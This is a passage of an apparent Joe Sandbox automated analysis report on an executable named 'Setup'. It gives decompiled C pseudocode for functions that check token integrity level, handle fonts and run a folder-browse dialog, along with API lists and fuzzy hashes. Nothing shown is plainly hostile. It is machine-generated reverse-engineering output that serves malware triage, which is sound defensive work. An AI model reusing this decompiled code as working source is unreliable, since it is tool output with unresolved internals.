                                                                                                                                                              0x00494fe1
                                                                                                                                                              0x00495007
                                                                                                                                                              0x00495007
                                                                                                                                                              0x0049500e
                                                                                                                                                              0x00495038
                                                                                                                                                              0x0049503f
                                                                                                                                                              0x00495059
                                                                                                                                                              0x00495059
                                                                                                                                                              0x0049503f
                                                                                                                                                              0x00495060
                                                                                                                                                              0x0049506f
                                                                                                                                                              0x0049506f
                                                                                                                                                              0x00495079
                                                                                                                                                              0x00495079
                                                                                                                                                              0x00495083
                                                                                                                                                              0x00495083
                                                                                                                                                              0x00494f9c
                                                                                                                                                              0x0049508f

                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,TI), ref: 00494F8F
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,000F01FF,00000000), ref: 00494FAF
                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00494FD9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00494FE3
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00494FFA
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00495001
                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00495022
                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00495032
                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 00495051
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00495068
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0049506F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00495079
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00495083
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HeapProcess$Token$AuthorityCloseHandleInformationOpen$AllocCountErrorFreeLast
                                                                                                                                                              • String ID: TI
                                                                                                                                                              • API String ID: 450452593-904328696
                                                                                                                                                              • Opcode ID: 383203ce0c10d7db99602d8c6fbeb3b5862c58af5cfa7231f5a60be066de4712
                                                                                                                                                              • Instruction ID: edd17054b5bd476a9413c6e0e80b0268b284cd7ee6b01c9050d968d219a2ff58
                                                                                                                                                              • Opcode Fuzzy Hash: 383203ce0c10d7db99602d8c6fbeb3b5862c58af5cfa7231f5a60be066de4712
                                                                                                                                                              • Instruction Fuzzy Hash: 0A412A74A00209EFEB14DFE4DC48BBFBBB8BB48305F208559E611A7290C7749A44DBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00411B30 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 160COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E00411B30(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v16;
				void* _v20;
				signed int _v28;
				signed int _v32;
				intOrPtr _v40;
				char _v48;
				signed int _v52;
				char _v124;
				signed char _v129;
				signed char _v130;
				signed int _v131;
				signed char _v132;
				short _v136;
				void _v152;
				struct HDC__* _v156;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed short _v174;
				short _v176;
				intOrPtr _v180;
				signed int _v184;
				intOrPtr _v188;
				char _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				signed int _t79;
				signed int _t80;
				intOrPtr _t84;
				signed int _t101;
				void* _t118;
				intOrPtr _t138;
				void* _t148;
				void* _t149;
				signed int _t150;

				_t149 = __esi;
				_t148 = __edi;
				_t142 = __edx;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(0x513f18);
				_push( *[fs:0x0]);
				_t79 =  *0x561244; // 0xddd124f9
				_t80 = _t79 ^ _t150;
				_v52 = _t80;
				_push(_t80);
				 *[fs:0x0] =  &_v16;
				if(_a8 != 0) {
					 *_a8 = 0;
					if((E00412640(_a4 + 0x8c, 0) & 0x000000ff) == 0) {
						L17:
						_t84 = E0040F0D0(_a4 + 0x8c, _a8);
					} else {
						_v40 = E00417320();
						_t129 =  &_v48;
						E00413100( &_v48);
						_v8 = 0;
						_v20 = GetStockObject(0x11);
						if(_v20 == 0) {
							_v20 = GetStockObject(0xd);
						}
						if(_v20 != 0) {
							GetObjectW(_v20, 0x5c,  &_v152);
							_v192 = 0x20;
							_v188 = E00415110( &_v124);
							_v176 = _v136;
							_v174 = _v129 & 0x000000ff;
							_v172 = _v132 & 0x000000ff;
							_t142 = _v131 & 0x000000ff;
							_v168 = _v131 & 0x000000ff;
							_v164 = _v130 & 0x000000ff;
							_t132 = _v152;
							_v28 = _v152;
							if(_v28 < 0) {
								_t142 =  ~_v28;
								_v28 =  ~_v28;
							}
							if( *(_a4 - 0x48) == 0) {
								_v156 = GetDC(GetDesktopWindow());
								if(_v156 != 0) {
									_v32 = GetDeviceCaps(_v156, 0x5a);
									ReleaseDC(GetDesktopWindow(), _v156);
									goto L16;
								} else {
									_v204 = E00411B10(_t132);
									_v8 = 0xffffffff;
									E00417350( &_v48);
									_t84 = _v204;
								}
							} else {
								_t138 = _a4;
								_t142 =  *(_t138 - 0x48);
								_v156 = GetDC( *(_t138 - 0x48));
								if(_v156 != 0) {
									_v32 = GetDeviceCaps(_v156, 0x5a);
									ReleaseDC( *(_a4 - 0x48), _v156);
									L16:
									_t101 = _v28 * 0xafc80;
									asm("cdq");
									_t142 = _t101 % _v32;
									_v184 = _t101 / _v32;
									_v180 = 0;
									__imp__#420( &_v192, 0x53bb74, E00434050(_a4 + 0x8c));
									_v8 = 0xffffffff;
									E00417350( &_v48);
									goto L17;
								} else {
									_v200 = E00411B10(_t138);
									_v8 = 0xffffffff;
									E00417350( &_v48);
									_t84 = _v200;
								}
							}
						} else {
							_v196 = E00411B10(_t129);
							_v8 = 0xffffffff;
							E00417350( &_v48);
							_t84 = _v196;
						}
					}
				} else {
					_t84 = 0x80004003;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t84, _t118, _v52 ^ _t150, _t142, _t148, _t149);
			}








































                                                                                                                                                              0x00411b30
                                                                                                                                                              0x00411b30
                                                                                                                                                              0x00411b30
                                                                                                                                                              0x00411b30
                                                                                                                                                              0x00411b33
                                                                                                                                                              0x00411b35
                                                                                                                                                              0x00411b40
                                                                                                                                                              0x00411b47
                                                                                                                                                              0x00411b4c
                                                                                                                                                              0x00411b4e
                                                                                                                                                              0x00411b51
                                                                                                                                                              0x00411b55
                                                                                                                                                              0x00411b5f
                                                                                                                                                              0x00411b6e
                                                                                                                                                              0x00411b89
                                                                                                                                                              0x00411d91
                                                                                                                                                              0x00411d9e
                                                                                                                                                              0x00411b8f
                                                                                                                                                              0x00411b94
                                                                                                                                                              0x00411b97
                                                                                                                                                              0x00411b9a
                                                                                                                                                              0x00411b9f
                                                                                                                                                              0x00411bae
                                                                                                                                                              0x00411bb5
                                                                                                                                                              0x00411bbf
                                                                                                                                                              0x00411bbf
                                                                                                                                                              0x00411bc6
                                                                                                                                                              0x00411bfa
                                                                                                                                                              0x00411c00
                                                                                                                                                              0x00411c16
                                                                                                                                                              0x00411c23
                                                                                                                                                              0x00411c2f
                                                                                                                                                              0x00411c3a
                                                                                                                                                              0x00411c40
                                                                                                                                                              0x00411c44
                                                                                                                                                              0x00411c4e
                                                                                                                                                              0x00411c54
                                                                                                                                                              0x00411c5a
                                                                                                                                                              0x00411c61
                                                                                                                                                              0x00411c66
                                                                                                                                                              0x00411c68
                                                                                                                                                              0x00411c68
                                                                                                                                                              0x00411c72
                                                                                                                                                              0x00411cea
                                                                                                                                                              0x00411cf7
                                                                                                                                                              0x00411d2d
                                                                                                                                                              0x00411d3e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00411cf9
                                                                                                                                                              0x00411cfe
                                                                                                                                                              0x00411d04
                                                                                                                                                              0x00411d0e
                                                                                                                                                              0x00411d13
                                                                                                                                                              0x00411d13
                                                                                                                                                              0x00411c74
                                                                                                                                                              0x00411c74
                                                                                                                                                              0x00411c77
                                                                                                                                                              0x00411c81
                                                                                                                                                              0x00411c8e
                                                                                                                                                              0x00411cc4
                                                                                                                                                              0x00411cd5
                                                                                                                                                              0x00411d44
                                                                                                                                                              0x00411d47
                                                                                                                                                              0x00411d4d
                                                                                                                                                              0x00411d4e
                                                                                                                                                              0x00411d51
                                                                                                                                                              0x00411d57
                                                                                                                                                              0x00411d7c
                                                                                                                                                              0x00411d82
                                                                                                                                                              0x00411d8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00411c90
                                                                                                                                                              0x00411c95
                                                                                                                                                              0x00411c9b
                                                                                                                                                              0x00411ca5
                                                                                                                                                              0x00411caa
                                                                                                                                                              0x00411caa
                                                                                                                                                              0x00411c8e
                                                                                                                                                              0x00411bc8
                                                                                                                                                              0x00411bcd
                                                                                                                                                              0x00411bd3
                                                                                                                                                              0x00411bdd
                                                                                                                                                              0x00411be2
                                                                                                                                                              0x00411be2
                                                                                                                                                              0x00411bc6
                                                                                                                                                              0x00411b61
                                                                                                                                                              0x00411b61
                                                                                                                                                              0x00411b61
                                                                                                                                                              0x00411da6
                                                                                                                                                              0x00411dbb

                                                                                                                                                              APIs
                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00411BA8
                                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 00411BB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ObjectStock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3428563643-3916222277
                                                                                                                                                              • Opcode ID: 9b1a264db2cb702789ca39313b2bd7c77a772eeb26aab85bd3ebce3a5b6c2027
                                                                                                                                                              • Instruction ID: 7b6f1a3cd9b7b8c1032d4b7fe158fce2d146cc943c6786df9d5a46ae891e121d
                                                                                                                                                              • Opcode Fuzzy Hash: 9b1a264db2cb702789ca39313b2bd7c77a772eeb26aab85bd3ebce3a5b6c2027
                                                                                                                                                              • Instruction Fuzzy Hash: C0713A74D04218DFDB14DFA4D855BEEBBB0FF08310F10829AE629A7291DB785A84CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F3900 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 372COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E004F3900(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __fp0, intOrPtr _a8, signed int _a12) {
				char _v8;
				char _v16;
				signed int _v17;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v64;
				char _v68;
				char _v100;
				intOrPtr _v104;
				char _v622;
				short _v624;
				signed int _v632;
				char _v640;
				intOrPtr _v652;
				intOrPtr _v656;
				char* _v660;
				WCHAR* _v664;
				intOrPtr _v668;
				char _v672;
				signed int _v676;
				char _v696;
				char _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v744;
				char _v745;
				char _v746;
				signed int _v747;
				char _v780;
				char _v781;
				signed int* _v788;
				intOrPtr _v792;
				void* __esi;
				signed int _t148;
				signed int _t149;
				signed int* _t155;
				signed char _t157;
				void* _t161;
				short _t170;
				signed int _t174;
				void* _t180;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int* _t225;
				signed int _t226;
				signed int _t228;
				void* _t229;
				void* _t238;
				signed int* _t262;
				void* _t339;
				void* _t341;
				signed int _t342;
				void* _t343;
				void* _t344;
				void* _t346;
				void* _t352;

				_t352 = __fp0;
				_t339 = __edi;
				_t323 = __edx;
				_t238 = __ebx;
				_push(0xffffffff);
				_push(0x511013);
				_push( *[fs:0x0]);
				_t344 = _t343 - 0x308;
				_t148 =  *0x561244; // 0xddd124f9
				_t149 = _t148 ^ _t342;
				_v36 = _t149;
				_push(_t340);
				_push(_t149);
				 *[fs:0x0] =  &_v16;
				_v788 = __ecx;
				if(_a8 == 1 || _a8 == 2) {
					if(E004150F0(0x5c1160) != _a12) {
						_v17 = E00404730(0x5c1160, 0xffffffff);
						E004D5110(_t238, _t339, _t340, _a12);
						_push(0);
						_push(0);
						_push(1);
						_push(0x2e);
						_push(0xffffffff);
						_t155 = E00416210( &(_v788[0x21]),  &_v704);
						_t323 =  *_t155;
						_push( *_t155);
						_push(0x5be034);
						E0049C910();
						_t344 = _t344 + 0x20;
						_t340 = _v17 & 0x000000ff;
						_t157 = E00404730(0x5c1160, 0xffffffff);
						__eflags = (_v17 & 0x000000ff) - (_t157 & 0x000000ff);
						if((_v17 & 0x000000ff) != (_t157 & 0x000000ff)) {
							_v24 = E00416BE0(E00416210( &(_v788[0x21]),  &_v708)) ^ 0x00003000;
							_t323 = _v24;
							__eflags =  &(_v788[0x21]);
							E00415FF0(E00416210( &(_v788[0x21]),  &_v712), 0xffffffec, _v24);
						}
						E00417910(L"UIL", E00434050( &_v745));
						_v8 = 0;
						_t161 = E004150F0(0x5c1160);
						E005018F0(E00501CE0(), __eflags,  &_v744, _t161);
						_v8 = 0xffffffff;
						E004176E0();
						__eflags = _a8 - 1;
						if(_a8 != 1) {
							E00417660( &_v68, E00406870( &(_v788[0x47]), _v788[0x4b]));
							_v8 = 2;
							_v32 = E00405200( &_v64, __eflags, L"&lang=", 0);
							__eflags = _v32 - 0xffffffff;
							if(_v32 != 0xffffffff) {
								_v32 = _v32 + 6;
								_v104 = E004468C0( &_v64, 0x26, _v32);
								__eflags = _v104 - 0xffffffff;
								if(_v104 == 0xffffffff) {
									_v104 = E0042E0C0( &_v64);
								}
								E004175C0(E00434050( &_v746));
								_v8 = 3;
								E00405370( &_v100, E004150F0(0x5c1160), 0xa);
								__eflags =  &_v100;
								if( &_v100 == 0) {
									_v792 = 0;
								} else {
									_v792 =  &_v100 + 4;
								}
								E004051A0( &_v64, _v32, _v104 - _v32, _v792);
								_t323 = _v788[0x4b];
								__eflags =  &(_v788[0x47]);
								E004181D0(E00406870( &(_v788[0x47]), _v788[0x4b]),  &_v68);
								E004F0B90(_t238, _v788, _v788[0x4b], _t339, _t340, _v788[0x4b]);
								_v8 = 2;
								E004176E0();
							}
							_v8 = 0xffffffff;
							E004176E0();
							goto L19;
						}
						E00414C90();
						_v8 = 1;
						_t225 = _v788;
						_t323 =  *( *(_t225 + 0x5c));
						_t226 =  *( *( *(_t225 + 0x5c)))( &(_v788[0x17]), E00434050( &_v28));
						__eflags = _t226;
						if(_t226 == 0) {
							_t228 = E0041D530( &_v28);
							__eflags = _t228;
							if(_t228 != 0) {
								_t229 = E0041D530( &_v28);
								E004F9110(_t238, E00404AE0(), _t323, _t339, _t340, __eflags, _t229);
							}
						}
						_v8 = 0xffffffff;
						E0040D320();
						goto L19;
					} else {
						_t170 = 0;
						goto L38;
					}
				} else {
					L19:
					__eflags = _a8 - 3;
					if(_a8 == 3) {
						_v624 = 0;
						E00451D90(_t339,  &_v622, 0, 0x206);
						_t346 = _t344 + 0xc;
						E00416A10( &_v640);
						_v8 = 4;
						 *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x80))))(_v788, L"getBrowse", 0, 0,  &_v640);
						__eflags = _v632;
						if(_v632 != 0) {
							E0045184A( &_v624, _v632);
							_t346 = _t346 + 8;
						}
						_t192 = _v788[0x21];
						_v672 = _t192;
						_v668 = 0;
						_v664 =  &_v624;
						_v660 = L"Select Directory";
						_v656 = 3;
						_v652 = 0;
						_t323 =  &_v672;
						__imp__SHBrowseForFolderW( &_v672);
						_v676 = _t192;
						__eflags = _v676;
						if(_v676 != 0) {
							_t194 =  &_v624;
							__imp__SHGetPathFromIDListW(_v676, _t194);
							__eflags = _t194;
							if(_t194 != 0) {
								_t196 = StrStrIW( &_v624, E00403C30(0x5be390));
								__eflags = _t196;
								if(_t196 == 0) {
									PathAddBackslashW( &_v624);
									E0045181C( &_v624, E00403C30(0x5be390));
								}
								E004169E0( &_v696,  &_v624);
								_v8 = 5;
								_t323 =  *_v788;
								 *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x80))))(_v788, L"setBrowse",  &_v696, 1, 0);
								_v8 = 4;
								E00417430( &_v696);
							}
						}
						_v8 = 0xffffffff;
						E00417430( &_v640);
					}
					__eflags = _a8 - 4;
					if(_a8 == 4) {
						__eflags = _a12;
						if(_a12 != 0) {
							E00416A50( &_v700,  *_a12);
							_v8 = 6;
							E00417910(_v700, E00434050( &_v781));
							_v8 = 7;
							_t180 = E004F2A70(_t238, _v788, _t339, _t340, _t352,  &_v780, 1);
							__eflags = _t180 - 0xa;
							_v747 = 0 | _t180 == 0x0000000a;
							_v8 = 6;
							E004176E0();
							_t323 = _v747 & 0x000000ff;
							__eflags = _v747 & 0x000000ff;
							if((_v747 & 0x000000ff) != 0) {
								__eflags =  &(_v788[0x4d]);
								E00415F90( &_v700, E00416A30( &(_v788[0x4d])));
								E00415F50( &_v700, _a12);
							}
							_v8 = 0xffffffff;
							E00417300( &_v700);
						}
					}
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t262 = _v788;
						_t323 =  *(_t262 + 0xf4) & 0x000000ff;
						__eflags =  *(_t262 + 0xf4) & 0x000000ff;
						if(( *(_t262 + 0xf4) & 0x000000ff) == 0) {
							_t323 = _v788;
							_t174 =  *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x28))))(_v788);
							__eflags = _t174;
							if(_t174 == 0) {
								 *0x5bdd20 = 2;
								E004EFD20(_v788);
							}
						}
					}
					_t170 = 0;
					__eflags = 0;
					L38:
					 *[fs:0x0] = _v16;
					_pop(_t341);
					return E0044F6C8(_t170, _t238, _v36 ^ _t342, _t323, _t339, _t341);
				}
			}































































                                                                                                                                                              0x004f3900
                                                                                                                                                              0x004f3900
                                                                                                                                                              0x004f3900
                                                                                                                                                              0x004f3900
                                                                                                                                                              0x004f3903
                                                                                                                                                              0x004f3905
                                                                                                                                                              0x004f3910
                                                                                                                                                              0x004f3911
                                                                                                                                                              0x004f3917
                                                                                                                                                              0x004f391c
                                                                                                                                                              0x004f391e
                                                                                                                                                              0x004f3921
                                                                                                                                                              0x004f3922
                                                                                                                                                              0x004f3926
                                                                                                                                                              0x004f392c
                                                                                                                                                              0x004f3936
                                                                                                                                                              0x004f394f
                                                                                                                                                              0x004f3964
                                                                                                                                                              0x004f396b
                                                                                                                                                              0x004f3973
                                                                                                                                                              0x004f3975
                                                                                                                                                              0x004f3977
                                                                                                                                                              0x004f3979
                                                                                                                                                              0x004f397b
                                                                                                                                                              0x004f3990
                                                                                                                                                              0x004f3995
                                                                                                                                                              0x004f3997
                                                                                                                                                              0x004f3998
                                                                                                                                                              0x004f399d
                                                                                                                                                              0x004f39a2
                                                                                                                                                              0x004f39a5
                                                                                                                                                              0x004f39b0
                                                                                                                                                              0x004f39b8
                                                                                                                                                              0x004f39ba
                                                                                                                                                              0x004f39e0
                                                                                                                                                              0x004f39e3
                                                                                                                                                              0x004f39f6
                                                                                                                                                              0x004f3a03
                                                                                                                                                              0x004f3a03
                                                                                                                                                              0x004f3a1f
                                                                                                                                                              0x004f3a24
                                                                                                                                                              0x004f3a30
                                                                                                                                                              0x004f3a44
                                                                                                                                                              0x004f3a49
                                                                                                                                                              0x004f3a56
                                                                                                                                                              0x004f3a5b
                                                                                                                                                              0x004f3a5f
                                                                                                                                                              0x004f3aeb
                                                                                                                                                              0x004f3af0
                                                                                                                                                              0x004f3b06
                                                                                                                                                              0x004f3b09
                                                                                                                                                              0x004f3b0d
                                                                                                                                                              0x004f3b19
                                                                                                                                                              0x004f3b2a
                                                                                                                                                              0x004f3b2d
                                                                                                                                                              0x004f3b31
                                                                                                                                                              0x004f3b3b
                                                                                                                                                              0x004f3b3b
                                                                                                                                                              0x004f3b4d
                                                                                                                                                              0x004f3b52
                                                                                                                                                              0x004f3b66
                                                                                                                                                              0x004f3b6e
                                                                                                                                                              0x004f3b70
                                                                                                                                                              0x004f3b80
                                                                                                                                                              0x004f3b72
                                                                                                                                                              0x004f3b78
                                                                                                                                                              0x004f3b78
                                                                                                                                                              0x004f3b9f
                                                                                                                                                              0x004f3bae
                                                                                                                                                              0x004f3bbb
                                                                                                                                                              0x004f3bc8
                                                                                                                                                              0x004f3be0
                                                                                                                                                              0x004f3be5
                                                                                                                                                              0x004f3bec
                                                                                                                                                              0x004f3bec
                                                                                                                                                              0x004f3bf1
                                                                                                                                                              0x004f3bfb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f3bfb
                                                                                                                                                              0x004f3a64
                                                                                                                                                              0x004f3a69
                                                                                                                                                              0x004f3a82
                                                                                                                                                              0x004f3a8c
                                                                                                                                                              0x004f3a8e
                                                                                                                                                              0x004f3a90
                                                                                                                                                              0x004f3a92
                                                                                                                                                              0x004f3a97
                                                                                                                                                              0x004f3a9c
                                                                                                                                                              0x004f3a9e
                                                                                                                                                              0x004f3aa3
                                                                                                                                                              0x004f3ab0
                                                                                                                                                              0x004f3ab0
                                                                                                                                                              0x004f3a9e
                                                                                                                                                              0x004f3ab5
                                                                                                                                                              0x004f3abf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f3951
                                                                                                                                                              0x004f3951
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f3951
                                                                                                                                                              0x004f3c00
                                                                                                                                                              0x004f3c00
                                                                                                                                                              0x004f3c00
                                                                                                                                                              0x004f3c04
                                                                                                                                                              0x004f3c0c
                                                                                                                                                              0x004f3c21
                                                                                                                                                              0x004f3c26
                                                                                                                                                              0x004f3c2f
                                                                                                                                                              0x004f3c34
                                                                                                                                                              0x004f3c60
                                                                                                                                                              0x004f3c62
                                                                                                                                                              0x004f3c69
                                                                                                                                                              0x004f3c79
                                                                                                                                                              0x004f3c7e
                                                                                                                                                              0x004f3c7e
                                                                                                                                                              0x004f3c87
                                                                                                                                                              0x004f3c8d
                                                                                                                                                              0x004f3c93
                                                                                                                                                              0x004f3ca3
                                                                                                                                                              0x004f3ca9
                                                                                                                                                              0x004f3cb3
                                                                                                                                                              0x004f3cbd
                                                                                                                                                              0x004f3cc7
                                                                                                                                                              0x004f3cce
                                                                                                                                                              0x004f3cd4
                                                                                                                                                              0x004f3cda
                                                                                                                                                              0x004f3ce1
                                                                                                                                                              0x004f3ce7
                                                                                                                                                              0x004f3cf5
                                                                                                                                                              0x004f3cfb
                                                                                                                                                              0x004f3cfd
                                                                                                                                                              0x004f3d15
                                                                                                                                                              0x004f3d1b
                                                                                                                                                              0x004f3d1d
                                                                                                                                                              0x004f3d26
                                                                                                                                                              0x004f3d3e
                                                                                                                                                              0x004f3d43
                                                                                                                                                              0x004f3d53
                                                                                                                                                              0x004f3d58
                                                                                                                                                              0x004f3d72
                                                                                                                                                              0x004f3d81
                                                                                                                                                              0x004f3d83
                                                                                                                                                              0x004f3d8d
                                                                                                                                                              0x004f3d8d
                                                                                                                                                              0x004f3cfd
                                                                                                                                                              0x004f3d92
                                                                                                                                                              0x004f3d9f
                                                                                                                                                              0x004f3d9f
                                                                                                                                                              0x004f3da4
                                                                                                                                                              0x004f3da8
                                                                                                                                                              0x004f3dae
                                                                                                                                                              0x004f3db2
                                                                                                                                                              0x004f3dc4
                                                                                                                                                              0x004f3dc9
                                                                                                                                                              0x004f3de9
                                                                                                                                                              0x004f3dee
                                                                                                                                                              0x004f3e01
                                                                                                                                                              0x004f3e08
                                                                                                                                                              0x004f3e0e
                                                                                                                                                              0x004f3e14
                                                                                                                                                              0x004f3e1e
                                                                                                                                                              0x004f3e23
                                                                                                                                                              0x004f3e2a
                                                                                                                                                              0x004f3e2c
                                                                                                                                                              0x004f3e34
                                                                                                                                                              0x004f3e46
                                                                                                                                                              0x004f3e55
                                                                                                                                                              0x004f3e55
                                                                                                                                                              0x004f3e5a
                                                                                                                                                              0x004f3e67
                                                                                                                                                              0x004f3e67
                                                                                                                                                              0x004f3db2
                                                                                                                                                              0x004f3e6c
                                                                                                                                                              0x004f3e70
                                                                                                                                                              0x004f3e72
                                                                                                                                                              0x004f3e78
                                                                                                                                                              0x004f3e7f
                                                                                                                                                              0x004f3e81
                                                                                                                                                              0x004f3e8b
                                                                                                                                                              0x004f3e95
                                                                                                                                                              0x004f3e97
                                                                                                                                                              0x004f3e99
                                                                                                                                                              0x004f3e9b
                                                                                                                                                              0x004f3eab
                                                                                                                                                              0x004f3eab
                                                                                                                                                              0x004f3e99
                                                                                                                                                              0x004f3e81
                                                                                                                                                              0x004f3eb0
                                                                                                                                                              0x004f3eb0
                                                                                                                                                              0x004f3eb2
                                                                                                                                                              0x004f3eb5
                                                                                                                                                              0x004f3ebd
                                                                                                                                                              0x004f3ecb
                                                                                                                                                              0x004f3ecb

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F3AA9
                                                                                                                                                                • Part of subcall function 00416BE0: GetWindowLongW.USER32(00000000,000000EC), ref: 00416BEF
                                                                                                                                                                • Part of subcall function 00415FF0: SetWindowLongW.USER32 ref: 00416005
                                                                                                                                                              • _memset.LIBCMT ref: 004F3C21
                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F3C79
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004F3CCE
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004F3CF5
                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000), ref: 004F3D15
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,?,?,?,?,?,?,00000000), ref: 004F3D26
                                                                                                                                                              • _wcscat.LIBCMT ref: 004F3D3E
                                                                                                                                                                • Part of subcall function 00416210: GetParent.USER32(-00000084), ref: 0041621D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongPathWindow$BackslashBrowseFolderFromImmortalizeListParent_memset_wcscat_wcscpy
                                                                                                                                                              • String ID: &lang=$UIL$getBrowse$setBrowse
                                                                                                                                                              • API String ID: 2266113042-1634581760
                                                                                                                                                              • Opcode ID: fce5fad9a5188bc65b5fdd797f1f44c65d6c844206c7945e1528684482040bd4
